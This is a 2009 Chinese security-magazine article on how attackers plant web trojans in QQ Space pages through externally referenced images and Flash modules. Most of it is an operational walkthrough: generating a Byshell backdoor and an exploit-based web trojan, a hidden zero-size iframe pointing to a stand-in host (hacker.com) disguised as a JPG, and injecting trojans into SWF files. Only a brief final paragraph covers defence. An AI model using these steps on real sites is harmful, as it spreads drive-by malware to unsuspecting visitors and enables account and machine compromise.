踩QQ空间 留心“地雷”
安全阵线
本期主角:QQ空间
问题所在:允许引用外部链接
主要危害:用于挂马
调研时间:2009.5.23~2009.5.27
踩QQ空间,是否踩到过“地雷”——网页木马?目前,新的QQ空间挂马方法被发现,踩到“地雷”的可能性大大增加了。
“我的QQ空间里面被挂马了,访问过的朋友请杀毒!”这是笔者一个朋友的最近的QQ签名。说起来她真的很郁闷,她的QQ被盗后不足一天就找回来了,可不久她的一些好友抱怨访问了她的QQ空间电脑就变慢了。笔者得知这件事后,调查发现她的QQ空间里面竟然被挂马了。
笔者进行了深入调查,发现笔者朋友QQ空间挂马利用的是图片。要知道网上有不少QQ空间挂马的文章,但除了MP3音乐挂马外其他的基本上都失效了。经过多次试验,笔者发现,QQ空间除了图片可以挂马,Flash动画也可以用来挂马。
小百科: QQ空间类似个人博客。用户可以在QQ空间发布自己的个人日志、照片等各种信息,而好友或者网友则可以通过网址访问他的QQ空间页面。
个性设置有安全隐患
QQ空间向QQ用户提供了一个非常方便的功能,这个功能允许QQ用户在自己的QQ空间设置一些个性的模块。简单地说就是允许用户在QQ空间的网页中添加自己喜欢的一些图片、动画等网页元素,丰富自己的QQ空间。
但是QQ空间并没有对用户引用的图片进行限制,允许用户引用来自QQ之外的链接,因此黑客可以从QQ空间外部引用恶意的图片、Flash资源,来踩QQ空间的用户就会被网页木马攻击(该安全隐患已经通知了腾讯)。
图片挂马法
在QQ空间中测试之后发现,利用QQ空间挂马的方法不止一种,其中最简单的方法就是使用图片木马。这种方法隐蔽性高,操作也非常简单。
第一步:打开后门程序“Byshell”,在“生成配置服务端”选项中输入IP地址等参数,然后生成一个后门服务端并上传到准备好的网络空间中。准备一个网页木马生成器,例如利用MS0-902漏洞或暴风影音漏洞的木马生成器,再输入上传的网络空间中后门程序的地址,生成一个网页木马并上传到网络空间即可(图1)。
第二步:新建一个记事本程序,在记事本中输入以下代码:
<iframe src="http://www.hacker.com/网马链接地址.html" height=0 width=0><iframe>
<div class="style1">
<img src="http://www.hacker.com/正常图片链接地址.jpg">
</html>
代码输入完成后,将文件另存为JPG图片格式(图2),然后上传到网络空间中。
小提示:对于第一段代码“http://www.hacker.com/网马链接地址.html”,黑客会根据需要修改成自己的网页木马地址。而在第三段代码“http://www.hacker.com/正常图片链接地址.jpg”中,黑客会选择一幅正常的图片用来伪装。
第三步:打开QQ空间,进入后点击“自定义”选项,此时在QQ空间中会多出一条菜单栏。在这条菜单栏中点击“模块”选项(图3),进入模块选项后点击右侧的“新建模块”按键(图4)。
在弹出的“添加个性化模块”窗口中点击“大图模块”,接下来填写大图模块的参数,第一项“模块标题”可以随意填写,第二项“图片地址”输入制作好的图片木马地址,最后点击“确定”之后,图片木马就挂在QQ空间上了。
Flash动画挂马法
比起图片木马,Flash动画挂马的危害更大一些,这种方法也是黑客在QQ空间中使用最多的。用Flash动画挂马不仅伪装更高,而且对于网络环境也没有太多的限制,能够给黑客带来更多的“受害者”。
第一步:使用Flash动画挂马同样是利用了QQ空间中的模块功能,黑客同样会先选择一个网页木马。不过在生成网页木马后,黑客会选取一个诱人的Flash动画,这种动画文件的后缀通常为SWF。
第二步:黑客在选取好后缀为SWF的Flash动画后,打开SWF插入软件“ICodeToSWF”,这款软件能够在SWF动画中插入HTML网页。打开软件后,黑客在软件界面的第一个选项“SWF文件”选项中选择一个SWF文件,在下面“插入代码”选项中选取生成的网页木马(图5),点击“插入”之后就完成了SWF文件和网马的结合,再将SWF文件上传到指定的网络空间中。
第三步:与插入图片操作相同,点击QQ空间中的“自定义→模块→新建模块”选项,不过在“添加个性化模块”界面中选取的是“Flash模块”,然后输入模块标题,在“Flash动画地址”一栏中输入上传的SWF文件地址即可(图6)。在点击“确认”后,QQ空间中就挂入了一个Flash动画木马。
防范技巧
要想堵上QQ空间中的挂马漏洞,可以将引用的图片限制在QQ网站中,例如QQ像册中。此外,QQ空间还应该增加更多检测措施,不允许在输入框中直接输入HTML页面地址。普通读者在上网时,最好使用能拦截网页木马的安全辅助工具,避免被网页木马骚扰。